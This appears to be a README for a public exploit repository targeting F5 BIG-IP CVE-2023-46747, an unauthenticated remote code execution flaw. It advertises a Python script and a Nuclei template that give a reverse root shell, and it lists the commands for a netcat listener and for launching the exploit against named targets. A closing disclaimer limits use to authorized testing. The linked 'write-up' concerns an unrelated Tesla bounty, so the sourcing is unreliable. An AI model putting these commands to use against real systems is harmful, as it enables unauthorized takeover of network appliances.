
#F5-BIG-IP-CVE-2023-46747-Exploit – Unauthentifizierte RCE Python-Exploit & Nuclei-Template von Raguraman ✓ Automatisierte TCP-Reverse-Shell (LHOST/LPORT) ✓ Getestet auf betroffenen BIG-IP-Versionen 13.x–17.x ⚠️ Nur für autorisiertes Pentesting
Python3 & Nuclei-Versionen – von raguraman
Kritische RCE ohne Authentifizierung (CVSS 9.8) über AJP + HTTP-Request-Smuggling
Funktioniert auf allen ungepatchten BIG-IP-Versionen 13.x → 17.x (einschließlich der neuesten 17.1.0.3)
Patch: https://my.f5.com/manage/s/article/K000137353 (Nov. 2023)
Praxisbericht zum Exploit: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → eigenständiges Python3 (empfohlen)CVE-2023-46747-revshell.yaml → Nuclei-Template (optional)# 1. Start your listener
nc -lvnp 4444
# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → Instant root shell!
Verwendung – Nuclei-Template (Alternative) Bash # 1. Edit LHOST and LPORT inside the YAML file
nc -lvnp 4444
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests gedacht, zum Beispiel:
Freigegebene Penetrationstest-Aufträge
Red-Team-Operationen mit schriftlicher Genehmigung
Forschung in einer kontrollierten Laborumgebung
Verwenden Sie diesen Exploit nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Unbefugte Ausnutzung ist illegal und kann zu strafrechtlicher Verfolgung führen.
Durch die Nutzung dieses Tools übernehmen Sie die volle Verantwortung für die Einhaltung geltender Gesetze. Der Autor haftet nicht für Missbrauch oder Schäden.